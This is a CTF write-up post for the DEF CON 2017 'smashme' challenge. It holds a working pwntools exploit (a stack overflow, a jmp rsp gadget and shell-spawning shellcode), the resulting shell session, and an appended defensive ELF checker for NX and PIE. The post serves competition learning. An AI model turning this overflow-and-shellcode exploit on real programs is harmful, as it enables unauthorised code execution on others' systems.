[DEF CON CTF Qualifier 2017] smashme

Practice board for hacking-competition (CTF) challenge write-ups


Post by amesianx » Mon May 01, 2017 8:17 pm


# Python 2 pwntools script (print statement, generator .next())
from pwn import *

context(arch='amd64', os='linux')

elf = ELF('./smashme')
rop = ROP(elf)

#conn = remote('smashme_omgbabysfirst.quals.shallweplayaga.me', 57348)
conn = process(['./smashme'])
print conn.recvuntil('Welcome to the Dr. Phil Show. Wanna smash?')
# reply string, NUL-terminated; it is padded out to 72 bytes below
k = 'Smash me outside, how bout dAAAAAAAAAAA\0'
# shellcode: dup fd 4 (the client socket on the remote service) onto stdin/stdout, then exec a shell
shellcode = asm(shellcraft.dupsh(4))
# address of a 'jmp rsp' gadget inside the binary: a fixed address because there is no PIE,
# and usable as a trampoline onto the stack because NX is disabled
jmp_rsp = p64(elf.search(asm("jmp rsp")).next())
# two NOPs followed by a short forward jump (eb 16) that lands inside the NOP sled
jmp = "\x90\x90\xeb\x16"
nop = "\x90"*60
# 72 bytes up to the saved return address, then the gadget address, then the stack-resident payload
conn.send(k.ljust(72, 'A') + jmp_rsp + jmp + nop + shellcode + '\n')
conn.interactive()


root@e2837c6b25fd ~/CTF/defcon
# python ex.py
[*] '/root/CTF/defcon/smashme'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
[*] Loaded cached gadgets for './smashme'
[+] Starting local process './smashme': pid 9188
Welcome to the Dr. Phil Show. Wanna smash?

[*] Switching to interactive mode

$ ls -al
total 332324
drwxr-xr-x  9 1002 1002      4096 May  1 11:18 .
drwxr-xr-x 14 1002 1002      4096 Apr 29 14:52 ..

[Attachment: solve2.png (screenshot of the solve)]
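The checksec lines in the output above (NX disabled, No PIE) are exactly why a stack-resident payload reached through a fixed-address jmp rsp works here. As an added example that is not part of the original post, the checker below reads those two properties straight from the ELF headers: NX from the PT_GNU_STACK program header flags and PIE from e_type. The function names and the two constructed minimal ELF images are mine; they stand in for the real smashme binary, which is not on this page.

```python
import struct

PT_GNU_STACK = 0x6474E551  # program header that carries the stack permissions
PF_X = 0x1                 # executable bit in p_flags
ET_DYN = 3                 # e_type used by PIE executables (and shared objects)


def elf_mitigations(data):
    """Return {'nx': bool, 'pie': bool} for a little-endian ELF64 image (bytes).

    NX counts as enabled only when a PT_GNU_STACK header exists without PF_X;
    a missing header is treated as an executable stack, matching the kernel's
    legacy default on x86.
    """
    if data[:4] != b"\x7fELF" or data[4] != 2 or data[5] != 1:
        raise ValueError("not a little-endian ELF64 image")
    e_type = struct.unpack_from("<H", data, 16)[0]
    e_phoff = struct.unpack_from("<Q", data, 32)[0]
    e_phentsize, e_phnum = struct.unpack_from("<HH", data, 54)
    nx = False
    for i in range(e_phnum):
        p_type, p_flags = struct.unpack_from("<II", data, e_phoff + i * e_phentsize)
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
            break
    return {"nx": nx, "pie": e_type == ET_DYN}


def _fake_elf(e_type, stack_flags):
    """Constructed test data: a 64-byte ELF64 header plus one PT_GNU_STACK entry."""
    ehdr = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8  # e_ident: ELF64, LE, v1
    ehdr += struct.pack("<HHIQQQIHHHHHH", e_type, 0x3E, 1, 0x400000,
                        64, 0, 0, 64, 56, 1, 0, 0, 0)   # phoff=64, phentsize=56, phnum=1
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 0x10)
    return ehdr + phdr


# p_flags 7 = rwx stack, ET_EXEC: what checksec printed for smashme (NX disabled, No PIE)
SMASHME_LIKE = _fake_elf(2, 7)
# p_flags 6 = rw- stack, ET_DYN: the hardened build a defender would expect
HARDENED = _fake_elf(3, 6)

if __name__ == "__main__":
    print("smashme-like:", elf_mitigations(SMASHME_LIKE))
    print("hardened:    ", elf_mitigations(HARDENED))
```

Canary detection is deliberately left out: it needs the symbol table (a reference to __stack_chk_fail), not just the headers parsed here.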
